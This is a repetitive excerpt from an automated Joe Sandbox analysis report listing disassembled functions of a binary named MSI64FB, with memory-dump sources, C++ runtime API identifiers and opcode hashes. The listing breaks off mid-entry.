                                                                                                                                                                                                                                                    Function 00007FF749F4EE70 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 94c85e3a6885e86ff13da8fa6624b2fcaae79ce2fe23d2c55d0234a8f4776c47
                                                                                                                                                                                                                                                    • Instruction ID: 137391b0ae0cd9bc26c07adf1148f231dd690a4b9d326d3ac3684863c357de5f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94c85e3a6885e86ff13da8fa6624b2fcaae79ce2fe23d2c55d0234a8f4776c47
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F331B022A5DA42C0EB04BF11E5446B8E371FB94BA4F880231E90C037E5DF7CE482C320
                                                                                                                                                                                                                                                    Function 00007FF749F60F0C Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: c9a4e0e7b4ab53e893ed18d569bf3c5149d20095e87a3d9c04f0b0d324eb3b93
                                                                                                                                                                                                                                                    • Instruction ID: 60e5f8228b669223c3bbd7618d1c84bdd56fea947a2ba115e9511aa418cfef85
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9a4e0e7b4ab53e893ed18d569bf3c5149d20095e87a3d9c04f0b0d324eb3b93
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27318F22A1DB42D5FB09BF56E4405B9E370EB44BA0F980531DA1D476E5DE7CE846C320
                                                                                                                                                                                                                                                    Function 00007FF749F6136C Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: f8d9c0bd2c71f697212810967ca2a7778e2269472297f3c0d1cf3f675de6a3fc
                                                                                                                                                                                                                                                    • Instruction ID: 2c4d6c1337272d917e136152f624c70c1ccf6aebaea8578ab683c41f65b4b021
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8d9c0bd2c71f697212810967ca2a7778e2269472297f3c0d1cf3f675de6a3fc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A318E22B0CB42C1FB19BF55E4445B9E370EB55BA4F980631DA0E4BAE5DE7CE842C360
                                                                                                                                                                                                                                                    Function 00007FF749F713F4 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: fe0147dd7e8c9a9008553fd8054b97a45f220e1ff8879fcbf5305c1c729d6e27
                                                                                                                                                                                                                                                    • Instruction ID: fe093d70175b8a42916cf7b1d593f781d2b61ddd06e1745301a2676f05568684
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe0147dd7e8c9a9008553fd8054b97a45f220e1ff8879fcbf5305c1c729d6e27
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B316F22B0CA42D1FB19BF55E4445B9E371EB56BA0FA80231EA0D4B6E5DE7CE485C320
                                                                                                                                                                                                                                                    Function 00007FF749F61484 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: f686ba4721d73371ec3509b4bb3bffbc5e13784dbcae9ca6a7685ba5834ff75c
                                                                                                                                                                                                                                                    • Instruction ID: f65e732c2eaab0d37fb0ac8f8cd10fb29d16f0fb21ac166a3fb25b5405765952
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f686ba4721d73371ec3509b4bb3bffbc5e13784dbcae9ca6a7685ba5834ff75c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14315B22A1CB46D1EB09BF55E8405B9E371AB54BA0FD80531DA0E476E6DF6CE846C320
                                                                                                                                                                                                                                                    Function 00007FF749F7150C Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: ed674da2ea5aa6c971b9e2f219bb36e38f2821b5822bd66971173a8d5023320b
                                                                                                                                                                                                                                                    • Instruction ID: da1167c9cfdc2b0466ce07e9f85c5bfc59213187937affecb417425a25b34242
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed674da2ea5aa6c971b9e2f219bb36e38f2821b5822bd66971173a8d5023320b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD31AE22B0CA46C1EB19BF15E8445B8E371EB44BA4FC80632EA1E476E5DF7CE446C320
                                                                                                                                                                                                                                                    Function 00007FF749F6113C Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 283118c82c41f587953163e7f4014d1a595101a97f08c758c1cd7f0638e265a5
                                                                                                                                                                                                                                                    • Instruction ID: b5110833b7b35dea31bfd20f58843429fe7f3f5e469f21d3101677d8a1245a0a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 283118c82c41f587953163e7f4014d1a595101a97f08c758c1cd7f0638e265a5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A319E22B0CB46D5EB09BF55E8445B9E370EB84BA4F980531DA0D476E5DE3CE886C320
                                                                                                                                                                                                                                                    Function 00007FF749F61254 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 14c1cfe4f42c82462013705d13bf994eeaad3f4468061a80f1e898b84cfdccaf
                                                                                                                                                                                                                                                    • Instruction ID: bd590a2fc385f94297b6adde0802228cc85ee38977c0225e351fab2e7089f448
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14c1cfe4f42c82462013705d13bf994eeaad3f4468061a80f1e898b84cfdccaf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04313E22B0CB42D1EB19BF55E8445B9A371EB54BA4F980635DA0E47BD5DE6CE842C320
                                                                                                                                                                                                                                                    Function 00007FF749F7173C Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 7c14fbb30dc9cb119fca478a610244d5d74f2091f0ffb53f0a5167794b2ec2a0
                                                                                                                                                                                                                                                    • Instruction ID: 4740aee58702d05c2b3c50a3a258b157b4e633d701df3c53a3cca8ee3c176e8c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c14fbb30dc9cb119fca478a610244d5d74f2091f0ffb53f0a5167794b2ec2a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E731AE26B0CA42D1EB09BF55E8405B9E370EB84BA0FC80631EA5D076E5DE3CE546C320
                                                                                                                                                                                                                                                    Function 00007FF749F617CC Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 721e6d6b9b749dfe3bea2467e9aeecfb1fb42092264e1b5ebf8258e60cb65a40
                                                                                                                                                                                                                                                    • Instruction ID: 26444a694ad1be0fbfe2514d7bcd6a03dc2f582054e20eec4297ddcb15cf1423
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 721e6d6b9b749dfe3bea2467e9aeecfb1fb42092264e1b5ebf8258e60cb65a40
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD319C26B0CB42D1EB09BF65E8445B8F371EB54BA0F980631DA0D076E5DE7CE846C320
                                                                                                                                                                                                                                                    Function 00007FF749F71854 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: b979aff6e2d81896d5250cc4ceecd8053c1a0cd9e6b2a6db10c938e4a46ea882
                                                                                                                                                                                                                                                    • Instruction ID: f44a8c2c6df2153e18c3ecd481f7c392f03739e138f22e267fae9397be5ecc5a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b979aff6e2d81896d5250cc4ceecd8053c1a0cd9e6b2a6db10c938e4a46ea882
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0319C22B0CA46C1EB09BF56E4405B9E371FB54BA4F880671EA5E076E5DE7CE446C360
                                                                                                                                                                                                                                                    Function 00007FF749F4F8A0 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: fecaed234125225d04094b4d7a9aac20fb969254fe94d3bd86d407112c33d5c4
                                                                                                                                                                                                                                                    • Instruction ID: b00138cf2775370a87a6a2b034ebb8887f5cc5102b89065ecbc8e322cad8b89a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fecaed234125225d04094b4d7a9aac20fb969254fe94d3bd86d407112c33d5c4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44318D22A8DA46D1EF05BF15E8506B9B370FB94BA4F880131DA4D436E5DE6CE442C320
                                                                                                                                                                                                                                                    Function 00007FF749F71624 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 50a7e5dd756862258847633d0cc2bbb44e7e06336ef844e967a4d1909efec431
                                                                                                                                                                                                                                                    • Instruction ID: a0abd954f8fce3d9cb106e7faffd759edb0e4de90960c6a9488f211274a6eccc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50a7e5dd756862258847633d0cc2bbb44e7e06336ef844e967a4d1909efec431
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C131A022B0CA46D1FB19BF55E8405B8E371EB94BA4F980231EA4D476E5DE7CE486C320
                                                                                                                                                                                                                                                    Function 00007FF749F616B4 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 97d15f4b7e4db43da4c1468bb3b0722c14224d7c4c5551d2748ff46b8915a50d
                                                                                                                                                                                                                                                    • Instruction ID: 1978459b0891a15d7d636616d15259dcaa1a4ec55b289d8b8a5fe80587c230bb
